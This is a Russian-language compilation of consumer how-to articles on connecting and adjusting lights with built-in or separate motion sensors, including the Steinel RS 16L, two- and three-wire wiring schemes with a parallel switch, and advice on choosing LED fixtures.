29 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Как подключить светильник с датчиком движения

Подключение светильника с датчиком движения

Представляем вашему вниманию подробную пошаговую фото-инструкцию — установка и подключение светильника со встроенным датчиком движения.

В качестве примера возьмем светильник для внутреннего освещения со встроенным датчиком движения — Steinel RS 16L .
Светильник подходит как для потолочного монтажа, так и для настенного. В своем корпусе он объединяет обычный светильник с ультразвуковым высокочастотным датчиком движения, а также сумеречный выключатель (датчик освещенности).

Подробнее о том какие бывают типы датчиков движения, их преимущества и недостатки мы уже подробно описывали в статье «Датчики движения | Основные виды и их особенности, области применения».

Основные характеристики светильника с датчиком движения Steinel RS 16L следующие:

Габаритные Размеры: 275 x 95 мм
Питание: 230 – 240 В, 50 Гц
Максимальная мощность ламп: 60 Вт / E 27
Дополнительная подключаемая мощность: до 100 Вт
Угол обзора датчика движения: 360° с углом раствора 160° сквозь стекло, дерево и тонкие стены
Дальность действия: 1 – 8 м, плавная настройка
Интервал установки светового порога: 2 – 2000 лк
Интервал установки времени свечения: 5 сек. – 15 мин.
Частота работы ультразвукового сенсора: 5,8 ГГц
Класс защиты: IP 44 / II
Излучаемая мощность: 1 мВт

Комплект поставки светильника с датчиком движения Steinel RS 16L

Светильник поставляется в элегантной коробке, на которой отражена вся необходимая информация о его основных свойствах.

В комплект поставки входят следующие предметы:

— Корпус светильника, со встроенным датчиком движения

— Плафон из опалового стекла

— Набор крепежа и заглушек

— Набор дополнительных проставок, предупреждающие наклейки и т.д.

— Инструкция по применению, рекламные буклеты.

Схема подключения светильника с датчиком движения

Перед установкой была выполнена электропроводка для установки светильника с датчиком движения — выведен питающий кабель постоянно находящийся под напряжением.

Такая схема подключения возможна благодаря тому, что ВЧ-датчик движения, установленный в светильнике, выполняет функцию выключателя. Это одно из самых важных преимуществ светильников со встроенными датчиками движения, ведь для их работы не требуется реализации сложных схем, достаточно лишь подвести питающий кабель.

Вообще, все возможные схемы подключения, рекомендуемые для обычного датчика движения, возможно реализовать и для такого светильника, с основными из них мы вас уже знакомили в статье «Схема подключения датчика движения».

Приступаем к установке светильника с датчиком движения:

Установка светильника с датчиком движения

1. Подготавливаем светильник к установке. В отверстия для вводных кабелей устанавливаем специальные резиновые уплотнители из комплекта поставки.

2. Отключаем подачу электрического тока в месте установки. Для этого выключаем в распределительном щите автоматический выключатель, отвечающий за эту группу освещения. Если автоматы не подписаны, отключайте все по очереди и проверяйте напряжение на фазном проводе идущем к бра (обычно белый или коричневый), определить наличие напряжения можно с помощью индикаторной отвертки. Ни в коем случае не начинайте установку не отключив электричество!

3. Протягиваем вводной питающий кабель через резиновый уплотнитель в светильник и укорачиваем его до длины, достаточной для подключения проводов к клеммам светильника.

4. Фиксируем корпус светильника с датчиком движения на стене, через три крепежных отверстия, как показано на изображении ниже. Выбор крепежа необходимо делать учитывая тип поверхности, на которую производится установка, в нашем случае идеально подошли саморезы из комплекта поставки.

5. Подготавливаем питающий кабель. Снимаем с него оплетку. Для работы светильника достаточно лишь два провода – фазы и ноля, заземление здесь не требуется, так как корпус выполнен из диэлектрического материала, не пропускающего электрический ток.

6. Снимаем изоляцию с концов проводов, примерно н а 5 — 7мм.

7. Подключаем провода, п омещаем их в соответствующие клеммы светильника и фиксируем с помощью отвертки.

Белый — ФАЗНЫЙ провод — в клемму с маркировкой L .

Белый с синей полосой – НОЛЬ – в клемму с маркировкой N .

Как определить какой из проводов фаза, ноль, а какой заземление самостоятельно, вам поможет наша подробная инструкция — ЗДЕСЬ.

Остается не занятой одна клемма светильника (закрытая заглушкой), с маркировкой L со штрихом. Это управляющая клемма, через нее можно подавать питание на другое оборудование, будь то другие светильники группы (могут быть без встроенного датчика движения), вытяжные вентиляторы и т.п. Единственное ограничение — это потребляемая мощность этих устройств, она должна быть не более 100 Вт.

Принцип работы будет следующий — при обнаружении движения, в зоне охвата встроенного ультразвукового датчика, светильник загорится и подаст напряжение на клемму L со штрихом, после чего все устройства, подключенные к ней, так же включатся. Это очень удобная функция, она позволяет значительно расширить область применения светильников с датчиками движения в быту и на производстве.

8. Устанавливаем лампу в патрон светильника. В нашем случае была выбрана светодиодная (LED) лампа мощностью 13 Вт, теплого свечения, с требуемым для светильника типом цоколя e27.

9. Устанавливаем плафон . У данного светильника, плафон просто накручивается на корпус, при этом для полной фиксации, плафон достаточно повернуть всего на четверть оборота.

На этом установка завершена, включаем подачу электрического тока в распределительном щите и тестируем светильник с ВЧ датчиком движения.

Если все сделано правильно, светильник сразу загорится и если не обнаружит движения в зоне охвата, через некоторое время выключится. Изменить заводские настройки светильника со встроенным датчиком движения вы сможете следующим образом:

Настройка (регулировка) светильника с датчиком движения

В нашем светильнике со встроенным датчиком движения присутствует три параметра доступных для регулировки, это:

1. Установка радиуса действия (чувствительности) датчика движения

2. Регулировка времени (продолжительность включения)

3. Установка порога срабатывания сумеречного выключателя

Все настройки выполняются с помощью трех регуляторов, спрятанных под плафоном светильника, на корпусе.

Давайте разберемся за что отвечает каждый из них.

1. Установка радиуса действия (чувствительности) датчика движения
Эта регулировка позволяет настроить расстояние, на котором датчик движения, встроенный в светильник, сможет определять перемещения. Возможный диапазон регулировки от 1 метра (крайнее левое положение) до 8 метров (крайнее правое положение).

2. Регулировка времени (продолжительность включения)
Этот регулятор устанавливает продолжительность включения светильника. Диапазон регулировки от 5 секунд (крайнее левое положение) до 15 минут (крайнее правое положение). При обнаружении движения, в период, когда светильник уже включен, таймер сбрасывается и отчет времени начинается сначала.

3. Установка порога срабатывания сумеречного выключателя.
Требуемый порог срабатывания светильника устанавливается в диапазоне от 2лк (регулятор повернут влево) до 2000лк (регулятор повернут вправо).

Данной регулировкой, вы сможете настроить степень освещенности, при которой будет включаться светильник. Так, если помещение в дневное время освещается естественным солнечным светом, нет никакой необходимости в работе светильника и изменив порог срабатывания, вы заставите светильник включаться лишь в темное время суток.

На сегодняшний день существует великое множество различных модификаций светильников с датчиками движения, различных производителей, размеров и форм, предназначенных для разных условий эксплуатации, каждый найдет подходящий именно для него вариант. Главное, что все они имеют схожий принцип работы, и вы, используя эту статью, сможете самостоятельно установить, подключить и настроить практически любой светильник со встроенным датчиком движения.

Как правильно подключить датчик движения — 5 схем монтажа с выключателем и без.

Для того, чтобы упростить процесс управления освещением и автоматизировать его включение-отключение в определенных местах (подъезд, коридоры, вход в дом на улице и т.д.), применяются такие устройства как датчики движения.

Помимо работы в сетях освещения, они могут использоваться в охранных системах. Например для подачи звукового сигнала (рев сирены, включение звонка) при обнаружении движения в охраняемой зоне.

А еще их можно настроить на автоматическое открывание входных дверей, что широко применяется в торговых центрах и магазинах.

Давайте же рассмотрим как правильно подключить это устройство, разберем популярные схемы и перечислим ошибки, которые непосредственным образом влияют на погрешность работы прибора.

Первым делом определитесь, какая у вас модель датчика по типу подключения. Они бывают двух и трехпроводными.

Сначала изучим простейшую двухпроводную схему.

Двухпроводные датчики движения чаще всего ставят в обычные подрозетники. Общая картина его подключения состоит из 4-х элементов:

  • автоматический выключатель для подачи питания 220В
  • распредкоробка
  • сам датчик
  • светильники

Подключение прибора аналогично монтажу одноклавишного выключателя света. То есть, вам нужно подвести питающую фазу к датчику, и через него пустить ее на светильник.

При этом связку «датчик — светильник», лучше использовать на отдельном контуре, а не сажать его на общее освещение.

Рассмотрим процесс монтажа с самого начала. Первым делом заводите трехжильный кабель ВВГнг-Ls 3*1,5мм2 от автомата в щитке в распредкоробку. Обозначаете и маркируете его жилы: фаза, ноль, земля.

Далее протягиваете уже двухжильный провод до места установки датчика.

Где его лучше всего размещать?

Классический вариант для моделей устанавливаемых в подрозетник — на высоте 1,2-2,0м от уровня пола.

Не путайте их с настенными устройствами, размещаемыми в проходных коридорах или подъездах многоэтажек, либо на входе в здание. Эти обычно задираются под самый потолок, недалеко от дверей.

Также обратите внимание, чтобы никакие открытые двери не перекрывали угол обзора датчика.

Еще их не рекомендуется ставить над батареей или другими нагревательными приборами.

Далее, кабель идущий на светильник, также заводим в распредкоробку. Внутри нее соединяем все жилы в следующей последовательности.

Сначала ноли. От кабеля питания — на кабель светильника.

Далее заземление, если оно конечно есть.

А вот фазу с автомата, соединяем с одной из жилой, уходящей вниз на датчик (L). Вторую жилу от кабеля датчика, пускаем на светильник (L датчика).

Осталось подключить в подрозетнике сам датчик. Приходящую фазу с условным обозначением L, заводим на соответствующую клемму.

Вторую жилу подключаем на клемму, где нарисован осветительный прибор или знак «нагрузка», как на рисунке внизу.

Осталось спрятать в подрозетник весь механизм и установить декоративную рамку.

Далее на передней панели производим настройку. Для этого выкручиваете по порядку все «флажки».

  • 1 — переводите устройство в автоматический режим

  • 2-выставляете порог чувствительности

Дабы датчик не включался днем или в другое, не нужное вам время суток, в зависимости от уровня освещенности и силы светового потока.

  • 3-задаете время, через которое освещение отключится, как только исчезнет движение в зоне действия прибора

На этом все. Подаете напряжение и проверяете работу всей схемы.

Преимущества подобной двухпроводной схемы и данных датчиков движения:

  • простота монтажа и подключения
  • возможность принудительного включения освещения без дополнительных выключателей света
  • универсальность

Вы легко можете заменить любой одноклавишный выключатель подобным устройством и автоматизировать свою систему освещения, без каких либо капитальных затрат.

Однако есть и недостатки. Данные приборы зачастую плохо работают с энергосберегающими и светодиодным лампочками.

Они начинают мерцать, иногда очень даже сильно.

Переходим к трехпроводным датчикам с тремя клеммами. Самые популярные марки на нашем рынке — это инфракрасные датчики движения IEK модели от ДД-009 до ДД-019.

Популярность их объясняется прежде всего низкой ценой. Но и более дорогие экземпляры от других производителей, в принципе сделаны по точно такому же образцу. И процесс подключения и настройки будет аналогичным.

При покупке таких приборов обращайте внимание на степень их влагозащиты. В основной массе это IP44.

За пределами зданий их можно ставить только под навесом или козырьком. От прямого попадания дождя они не защищены. Здесь уже понадобятся полностью влгаозащищенные модели IP65.

Также смотрите на температуру эксплуатации, если вы намерены его использовать на улице. Большинство из них рассчитаны на работу только до минус 20С. Далее они начинают нещадно глючить.

На трехпроводной датчик придется заводить уже полноценные 220В, то есть фазу и ноль. Вся система также состоит из 4-х элементов:

  • автоматический выключатель
  • распредкоробка
  • датчик
  • светильник

По желанию многие добавляют еще отдельный выключатель света. Эту схему рассмотрим чуть ниже.

При подключении трехпроводного датчика, в распредкоробку будет заходить 3 кабеля:

  • трехжильный от автомата (фаза-ноль-земля)
  • трехжильный на освещение (если у вас светильники с металлическим корпусом)
  • трехжильный на датчик

Нули собираются в одну точку. «Земля» с автомата подключается к «земле» на светильнике. Все как по ранее рассмотренной схеме.

Вот только на датчик движения уже подается не одна фаза, а полноценные фаза-ноль. У данного девайса под корпусом имеется три клеммы.

  • две вводных — сюда вы заводите питание 220В

Они могут быть подписаны как L (фаза) и N (ноль).

  • и один выход

Обозначенный к примеру буквой «А».

Чтобы добраться до клемм, открутите на корпусе два самореза и снимите нижнюю защитную крышку.

Если у вас уже выведено из корпуса три разноцветных провода, ищите в инструкции их маркировку. Обычно это:

  • красный А — выход
  • синий N — ноль
  • коричневый L — фаза входная

Но лучше вскрыть крышечку и проверить все визуально.

Выходит именно фаза, которая и управляет всем освещением. В распредкоробке вы ее подключаете к фазной жиле кабеля, идущего на светильники или к другой нагрузке.

Вся схема будет выглядеть упрощенно следующим образом.

Если не хотите использовать распаечную коробку в качестве места соединения всех проводов, тогда придется заводить все жилы в сам датчик и соединять их на его клеммнике. Две нулевые жилы скручиваете между собой и затягиваете на клемме N.

Фазу с автомата питания пускаете на клемму L. Ну и к оставшемуся выходу подключаете жилу, уходящую на светильник. Грубо говоря, фазу-ноль с одного кабеля подали, фазу-ноль с другого вывели. Ничего сложного.

Получается та же самая 3-х проводная схема, только без распредкоробки.

После подключения на корпусе ищите элементы управления и настройки. Одна из «крутилок» отвечает за время суток. Там нарисованы солнышко и луна (Lux).

Для того, чтобы использовать девайс в светлое время суток, переключатель ставите в режим, где значок солнца. Если он вам нужен для работы в ночное время или в темном помещении, где нет естественного света — выкручиваете на луну.

Второй переключатель настраивает время отключения (Time). Двигаете реостат от минимума к максимуму и увеличиваете время автоматического отключения света, с нескольких секунд до нескольких минут.

Как выставить настройки так, чтобы прибор случайно не реагировал на домашних животных? Запомните главное, в этом случае чувствительность должна регулироваться не переключателями, а углом поворота всей сферы.

То есть, куда смотрит прозрачное окошко, на то оно и будет реагировать. Не хотите, чтобы свет загорался когда мимо пробегает кошка или собака, не направляйте сферу вниз к полу. Выставляйте окошко перпендикулярно плоскости стены или на уровне вашей головы.

Ну а если вдруг захотите, чтобы датчик вообще не срабатывал, то поверните его «голову» так, чтобы окошко смотрело на самый верх, как бы в небо.

Реальная зона захвата лучей датчика — примерно 9-10 метров. Хотя в документации заявляют больше.

Еще обращайте внимание на такое свойство, как чувствительность в зависимости от направления движения человека. Она будет максимальна, когда вы проходите мимо, и минимальна, когда идете навстречу лучам.

Поэтому в коридоре или подъезде многоэтажек, датчики лучше ставить на сразу над дверьми, а где-нибудь ближе к углу. В этом случае вы по любому будете именно пересекать лучи, а не двигаться навстречу им.

Главный недостаток такой 3-х проводной схемы — отсутствие принудительного включения освещения. Датчик движения может выйти из строя или начать некорректно работать. Из-за этого вы останетесь полностью без освещения.

Чтобы избежать подобных проблем, применяют третью схему с дополнительным выключателем света.

Эта схема является наиболее универсальной. В ней используется обычный одноклавишник.

Многие спросят: «У него же всего два контакта и два провода, а у датчика три. Куда девать лишнее?» Все очень просто, достаточно подключить его параллельно.

То есть, фазу от питающего автомата, нужно сразу завести не только на датчик, но и на одноклавишный выключатель света. Второй провод с одноклавишника присоединяется к контуру освещения, то есть к выходному проводнику с датчика.

Выглядит это следующим образом.

Теперь вы сможете включать и выключать светильники в любое время, в независимости от того, день у вас или ночь, есть движение в зоне действия девайса или нет, исправен он или сломан.

Кстати, если установить выключатель не параллельно, а последовательно в схему, то есть после него, дабы фаза разрывалась до датчика, вы столкнетесь с не совсем очевидной проблемой.

Казалось бы, такой вариант наиболее хорош. Всю схему можно полностью отключить от напряжения, а при необходимости ее включить и тут же запустить свет. Но дело в том, что при полном обесточивании и последующей подачи напряжения, лампочка не загорается сразу.

Сколько бы вы не прыгали перед датчиком и не махали руками. Ему нужно определенное время, дабы просканировать всю площадь на наличие объектов. У многих моделей на это уходит по 10-20 секунд.

А вы тем временем будете стоять в темноте и терпеливо ждать света. Согласитесь, что это не очень удобно.

А можно ли подключить 3-х проводной датчик не параллельно, а именно вместо одноклавишника? То есть, выкинуть его из схемы и поставить в разрыв фазы как в самом первом случае, подключив только два провода и не подводя ноля?

С некоторыми светодиодными лампочками такой фокус может пройти. Но вам понадобятся дополнительные компоненты.

Выбор, установка и настройка светодиодного светильника с датчиком движения

Энергосбережение — один из актуальных вопросов, которыми люди задаются изо дня в день. Именно по этой причине столь популярен светодиодный светильник с датчиком движения. В течение нескольких недель с момента появления на рынке он завоевал сердца потребителей, стал самым востребованным.

Если раньше стоимость таких источников света была велика, то сегодня купить их может каждый второй человек. В основном они эксплуатируются в жилых комнатах, рабочих кабинетах и коридорах различных предприятий.

Главная особенность светильников — наличие встроенного датчика, регистрирующего движение и автоматически включающего освещение. При отсутствии движения в течение нескольких секунд или минут освещение автоматически отключается. Пользователь самостоятельно задает временной промежуток на выключение.

Назначение и принцип работы светильника

Любому человеку свойственна забывчивость, поэтому нет ничего удивительного в лампочке, работающей в пустом помещении. Уходя с работы, из дома вы можете забыть щелкнуть по выключателю, что приведет к незначительному росту энергетических затрат. Если же это происходит с достаточной периодичностью, то расходы существенно увеличатся. Самое простое решение данной проблемы — монтаж светодиодных светильников, способных работать в автоматическом режиме и отключаться в случае отсутствия в помещении человека.

Не менее актуально применение таких приборов для квартиры, где проживают пожилые люди, не способные пользоваться выключателями или не знающими их месторасположения. Из-за низкого роста до выключателей могут не дотягиваться дети. Вспомните, как родители ругали вас из-за не выключенной лампочки в туалете, ванной или своей комнате.

Качественные светильники с датчиком движения должны характеризоваться рядом особенностей:

  • отсутствие реакции на животных, включая кошек и собак;
  • вторичного срабатывания из-за того, что в комнате появился другой человек;
  • отключение происходит после того, как все люди покинут помещение;
  • возможность настройки временного интервала, что важно для проходных комнат (коридоров) — времени должно хватить на то, чтобы пройти из одного конца помещения в другой;
  • световой порог предотвращает включение лампы в дневное время суток (при необходимости игнорируется).

Выпускаются электрические приборы проводного или беспроводного типа. Дорогостоящие изделия включают датчик, регулирующий уровень освещения. Он блокирует включение в светлое время суток, задает яркость в зависимости от уровня естественного освещения в комнате.

При появлении в радиусе действия прибора человек попадает под излучение первого светодиода. Контактируя с объектом, свет отражается и его изменение регистрирует второй светодиод. Установленная внутри электронная схема проводит необходимые расчеты и включает светильник.

Лампочки каждого типа имеют свои преимущества и недостатки. Лампы накаливания потребляют большое количество электроэнергии, люминесцентные опасны из-за находящейся в колбе ртути. Хоть светодиодные и не представляют угрозы, их существенным недостатком является высокая стоимость. Исходя из этого, запрещено размещать ртутные приборы в подъездах, на чердаках и других объектах ЖКХ: в случае механических повреждений ртуть попадет в окружающей среду и причинит вред здоровью человека, который в течение долгого времени мог не замечать поломку.

Основные виды светодиодных светильников

Существует несколько критериев для классификации светодиодных приборов. По предназначению изделия бывают:

  1. Уличный фонарь — используется для освещения двора частного дома, аллей и дорожек в парках.
  2. Светодиодный прожектор — на охраняемых объектах, характеризуется высокой мощностью и повышенной чувствительностью.
  3. Светильник с датчиком применяется для дома и квартир вместо стандартных осветительных приборов. Нередко эксплуатируется в подъездах и на лестничных площадках.

Оборудование бывает разным — в зависимости от расположения датчика движения. Элемент может встраиваться в корпус светильника, что считается стандартным и распространенным решением. Датчик может находиться в собственном корпусе, устанавливаемом на осветительный прибор, либо размещаться отдельно от лампы на произвольном участке.

Последний критерий — способ питания устройства. Помимо стандартного проводного подключения и питания от промышленной электросети существуют автономные изделия, работающие от батареек. Они характеризуются малым уровнем освещенности, низкой мощностью, но крайне экономичны. Используются в бытовых комнатах редкого пользования — в кладовках, на чердаках. Нередко применяются на объектах жилищно-коммунального хозяйства, включая лестничные площадки и подъезды. В обычных жилых комнатах, на кухне, в туалете и ванной принято устанавливать проводные светильники.

Конструкции светильников

Конструкция приборов плотно связана с их предназначением. Уличные фонари эксплуатируют для наружного освещения, стандартные лампы — для внутреннего, а прожекторы можно использовать и там, и там. Помимо расположения на охранных объектах светодиодные прожекторы применяют для освещения архитектурных сооружений, рекламных вывесок и т. п.

Светодиодные лампы — это отличная альтернатива люминесцентным и изделиям с нитью накала.

Есть более «экзотичные» конструкции. К примеру, вы можете купить патрон со встроенным датчиком движения, который устанавливается в любой осветительный прибор вместо стандартного или вкручивается в последний как обычная электрическая лампа (выполняет функцию переходника).

Основные технические параметры

Из главных технических характеристик светодиодного светильника выделим следующие:

  • мощность — измеряется в ваттах и влияет на уровень освещенности, потребление электроэнергии;
  • цветовая температура — в зависимости от значения лампа будет светить холодным белым или теплым желтым цветом (существует множество оттенков);
  • угол рассеивания;
  • число LED-диодов внутри корпуса;
  • рабочая температура — любой электротехнический элемент при эксплуатации нагревается и излучает тепло (светодиоды характеризуются меньшим нагревом);
  • напряжение для питания — при этом диоды считаются самыми устойчивыми устройствами к скачкам напряжения;
  • степень защиты — IP XY, где X — уровень защиты от пыли, а Y — от влаги.

Помимо технических параметров светодиодной лампы нужно обязательно учитывать характеристики встроенного в нее датчика:

  • чувствительность, непосредственно связанная с радиусом действия;
  • максимальный угол обзора — при расположении в углу прямоугольного помещения достаточно 90 градусов;
  • климатическая комплектация — способность или неспособность функционировать при экстремально высоких/низких температурах;
  • рабочая температура;
  • мощность нагрузки;
  • тумблеры для изменения различных параметров.

Уличные диодные фонари с датчиком движения должны характеризоваться высокой степенью защиты от пыли и влаги, широким диапазоном рабочих температур. Только в таком случае прибор может эксплуатироваться на открытом воздухе и не бояться неблагоприятных погодных условий.

Самым дорогостоящим датчиком движения считается потолочный, имеющий максимальный угол обзора, работающий во всех направлениях и обеспечивающий регистрацию движения практически во всех частях комнаты.

Расположение светильников на потолке

Независимо от наличия или отсутствия датчика движения светильники на потолке располагают максимально равномерно для качественного и эффективного освещения всего помещения. Не забывайте, что основное предназначение светильника — излучение света. Для начала выполните расчет необходимого числа ламп, устанавливаемых на потолок.

Существуют следующие стандарты для светодиодов:

  1. Для комфортного времяпровождения в гостиной на 1 кв. м должно быть не менее 3 Вт.
  2. В санузле и спальне — 2 Вт/кв. м (больше не нужно).
  3. Меньшие требования предъявляются к прихожей — 1 Вт/кв. м.
  4. В детской комнате есть игровая зона и место, где ваш ребенок будет выполнять домашние задания, поэтому здесь уровень освещенности высокий — 8 Вт на 1 кв. м. В таком случае нужно добавить диммер и отдельные выключатели для частичного или полного освещения, в зависимости от потребностей ребенка.

В зависимости от конкретного помещения индивидуальным будет непосредственное расположение светильников. В ванной комнате точечные приборы размещают по всему периметру на одинаковом расстоянии, чтобы избежать образования зон со слабым освещением.

В гостиной помимо расположенной по центру потолка люстры желательно расположить вдоль длинных стен точечные светильники, обеспечивающие приглушенный свет при отключении основного источника. Освещение в спальне практически такое же, как и в гостиной, за исключением выбора менее яркой люстры. Отличным вариантом станет применение диммера для регулировки яркости, настольной лампы и бра.

В детской комнате располагайте светильники равномерно по периметру помещения. Повысьте их плотность (количество) в рабочих зонах — игровой и для занятий. Аналогично поступите на кухне с местом приготовления пищи.

Если имеются настенные шкафы, то обратите внимание на следующее: отодвигайте место расположения светильников от края шкафа на 15–20 см ближе к центру комнаты.

Установка и настройка

Купив осветительное устройство с датчиком движения, изучите приложенную инструкцию и руководствуйтесь схемой подключения на каждом этапе монтажа. Процедура достаточно простая и не требует вызова профессионального мастера.

Пошагово действия выглядят приблизительно так:

  1. Выберите место, где будет размещен сенсор. Заранее представьте, как через комнату перемещаются жители дома, ориентируйтесь на расположение дверей.
  2. Параллельно подключите клавишный выключатель стандартного типа. В противном случае из-за скачков напряжения на сенсорном выключателе может перегореть индикатор. Также выключатель позволит отключить работу датчика и эксплуатировать светильники как обычные люстры.
  3. Подключите светильник с датчиком к контактам на выключателе и кабелю промышленной сети. Провод с фазой от датчика ведите до выключателя. Избегайте прямого подключения к фазе сети. Ноль соедините с сетью. Если есть необходимость, то установите заземление.
  4. Выполните качественную изоляцию всех проводов.
  5. Настройте работу сенсора — время выключения света при отсутствии движения и прочие параметры. Используйте рекомендации и требования производителя, заложенные в инструкции, либо действуйте по собственному усмотрению.

Для подключения автономного светодиодного светильника на батарейках действуйте аналогичным способом, но вместо промышленной сети используйте клеммы на батарейке.

Наличие светодиодных светильников с датчиками движения позволит сэкономить на потреблении электроэнергии, за счет автовключения упростит в доме пользование осветительными приборами для детей и стариков. Вы перестанете упрекать близких в том, что кто-либо забыл выключить свет в туалете или любой комнате дома.

Подключение датчика движения для освещения с выключателем: схема и пошаговая инструкция

Интеллектуальной электроникой домашнего назначения характеризуются приборы, получившие название “датчики движения”. Новый вид коммутационных устройств, предназначенных для источников света, способен показать большую функциональность по сравнению с традиционными конструкциями.

Например, подключение датчика движения для освещения с выключателем или без него повышает комфортность пользования осветительным прибором и способствует экономии энергоресурсов. Что же это за приборы – датчики движения? Предлагаем разобраться во всем по порядку.

В статье мы рассмотрели принцип работы разных датчиков движения, обозначили особенности их применения, а также привели практические советы по выбору монтажной схемы, осуществлению установки и наладки прибора.

Техническое определение интеллекта движения

Автоматика стабильно и последовательно охватывает бытовую сферу. Ручное управление практически любыми видами бытовой техники уверенно сводится к минимуму. Появление датчиков движения – очередное тому подтверждение.

Эти приборы (как правило, в миниатюрном исполнении) разработаны и производятся разными фирмами в различном конструкционном исполнении. Однако принцип действия всех существующих модификаций имеет общую базу – эффект излучения волн разного типа.

На текущий момент находят широкое применение следующие технологии:

Исходя из практики применения той или иной технологии для производства конкретного вида системы, результатом производства становятся конструкции разного типа.

В частности, обширное применение в различных сферах деятельности находят контроллеры движения:

  • ультразвуковые;
  • микроволновые;
  • фотоэлектрические;
  • инфракрасные;
  • томографические.

Кроме того, нужно отметить ещё одну примечательную деталь конструкционного толка.

Разделение датчиков движения на группы

Все существующие приборы контроля движения условно разделяются на три группы:

  • активные устройства;
  • пассивные устройства;
  • комбинированные устройства.

Отличаются одни от других технологическими особенностями.

Активные устройства – конструкции обычно выполнены по схеме приёмопередающих приборов, которыми рабочий сигнал излучается и воспринимается как отражённый от предметов.

Конструкции пассивного типа обычно работают по схеме получения сигнальных волн от внешнего мира. То есть здесь работает только техника приёма.

Комбинированные датчики, соответственно, сделаны с учётом двух отмеченных вариантов.

Львиная доля всего имеющегося ассортимента приходится на инфракрасные датчики, которые с точки зрения конструктивных особенностей относятся к разряду пассивных приборов. Это самое доступное и экономически оправданное оборудование для бытового применения.

Принцип действия инфракрасных приборов

Анализ теплового излучения – вот основа действия этого вида приборов, призванных контролировать перемещение людей. Для этого в конструкцию устройства внедрён высокочувствительный сенсор.

Элемент реагирует на тепловое фоновое излучение (от человека), отправляет сигнал электронной схеме сравнения, где определяется момент срабатывания. Чувствительность сенсора усиливается за счёт специальной линзы, установленной на пути следования тепловых волн.

Конструкции современных датчиков движения наделяются многоэлементными линзовыми системами. Такое решение делает возможным охватывать значительные площади подконтрольные датчикам. Например, установленный на высоте 4 м от уровня пола один инфракрасный датчик способен контролировать движение на площади 20-25 м 2 .

Каждый отдельно взятый прибор оснащается настроечным электронным модулем. При помощи специальных регуляторов (переменных резисторов или подобных элементов) устанавливается уровень чувствительности и время действия. Настройкой уровня чувствительности определяется работоспособность прибора в тех или иных условиях освещённости.

А система настройки по времени устанавливает временные границы сброса активного действия (возврата устройства в режим отслеживания). Эта граница может составлять от 1 секунды до 60 минут.

Также есть датчики движения с конструктивным исполнением, где поддерживается функция регуляции яркости света ламп. Эти приборы могут настраиваться на плавное изменение яркости сразу после замыкания цепи, включать освещение с некоторой задержкой.

Как подключить устройство в цепь освещения

Для датчиков движения с автоматической функцией управления осветительными приборами характерна потолочная установка. Приборы рассчитаны на крепление по схеме накладного монтажа. Однако не менее часто приборы контроля движения монтируют и на стенах.

Традиционные места установки – это помещения небольшой площади: жилые квартиры, офисы, вспомогательные помещения.

Следует подчеркнуть, что подключение датчиков движения возможно не только с целью коммутации приборов света. Этими же устройствами удобно переключать из одного режима в другой системы вентиляции, отопления и прочие.

Подключение приборов допускается в условиях нормальной окружающей среды. Использоваться приборы могут только внутри закрываемых помещений. Между тем, класс защиты этих устройств соответствует стандарту EN 60669-2-1.

Рекомендации по выбору схемы монтажа

Оптимальной высотой установки приборов контроля движения считается значение 2,5 м. Если соблюдается такое условие, радиус зоны чувствительности составит не менее 3,5 м. Большая часть городских и частных жилых зданий имеют помещения именно с такой высотой.

Монтажные работы должны исполняться лицами, имеющими профессиональные навыки работы с электрическим (электронным) оборудованием. Производство всех монтажных операций допустимо лишь при обесточенной линии электропередачи на месте монтажа.

Схемные решения для монтажа могут быть разными в зависимости от пользовательских потребностей. Часто применяется схема подключения осветительных приборов через датчик движения, задействованный в паре с обычным выключателем.

Рассмотрим этот вариант пошаговой инсталляцией.

Установка датчика движения с выключателем

Первым шагом пользователя обычно является выбор способа подводки питающего кабеля к телу датчика движения. Корпус датчика предварительно должен быть вскрыт. Разобрать корпус несложно. Нужно шлицевой отвёрткой слега поддеть край основания в точке расположения защёлки.

Допустимы два варианта подвода кабеля:

  • ввод сзади – как правило, применяется для скрытой проводки, конец которой выведен сквозь отверстие в потолке;
  • боковой подводили сбоку – используется для внешней прокладки кабеля.

В любом случае, необходимо удалить временную заглушку имеющегося входного отверстия.

Второй шаг – подключение проводников кабеля по месту назначения. Место назначения – точки клемм, отмеченные на корпусе прибора соответствующими символами (L, N, L1). В зависимости от производителя прибора, а также конфигурации устройства обозначения могут отличаться.

Шаг третий предполагает установку датчика движения – непосредственно крепление прибора к потолку. Под крепёж на корпусе основания прибора имеются отверстия. Через эти отверстия производится крепление.

Если потолок бетонный, предварительно точки крепежа следует разметить, рассверлить, снабдить дюбелями. Завершив крепление к потолку, к основанию прибора пристёгивают крышку и протирают всю конструкцию мягкой ветошью.

Шаг четвёртый – настройка прибора, суть которой заключается в установке требуемых значений на сервисных потенциометрах.

Классическое исполнение приборов обычно сопровождается тремя сервисными потенциометрами:

  • время задержки (Time);
  • яркость (Lux);
  • чувствительность (Meter).

Первым потенциометром можно выставить требуемые параметры задержки на отключение (то есть после того, как лампа загорится, она погаснет только по истечении заданного времени).

Вторым задают режим освещённости (минимальное значение для включения в полной темноте). Потенциометром три устанавливают степень чувствительности на движение. Обычно изначально чувствительность ставят на минимум.

Пятый шаг установки – тестирование датчика движения. Для выполнения этого действия следует воспользоваться соответствующей функцией (Test), которая включается установкой потенциометра (Time) в тестируемое положение (Test). Установив потенциометр на этой отметке, систему подключают к сетевому напряжению.

После подачи тока в линию следует выждать не менее 1 минуты. Это время необходимо для инициализации устройства, его вхождения в рабочий режим. Тестирование устройства может выполняться без подключения световых приборов. Контроль включения или отключения индицируется светодиодом, выведенным на переднюю панель.

В тестовом режиме работы датчика нужно активировать движение в границах зоны чувствительности. Если датчиком будет обнаружено движение, контрольный светодиод на передней панели должен зажигаться на короткое время (2-3 сек.). Вращая потенциометр чувствительности (Meter), подгоняют нужный уровень.

Аналогичным образом или с незначительной коррекцией осуществляется установка и настройка любых других приборов подобного класса (инфракрасных). Некоторые отличия обычно могут наблюдаться у приборов, рассчитанных на подключение нескольких нагрузочных каналов.

В составе таких конструкций могут устанавливаться дополнительные регуляторы и увеличиваться число клемм на подключение.

На нашем сайте есть подборка статей, посвященных выбору, установке и использованию датчиков движения для освещения. Советуем ознакомиться:

Выводы и полезное видео по теме

Этот небольшой видеогид демонстрирует наглядно, каким образом проводятся операции подключения для некоторых модификаций приборов. Есть смысл посмотреть для совершенствования практики.

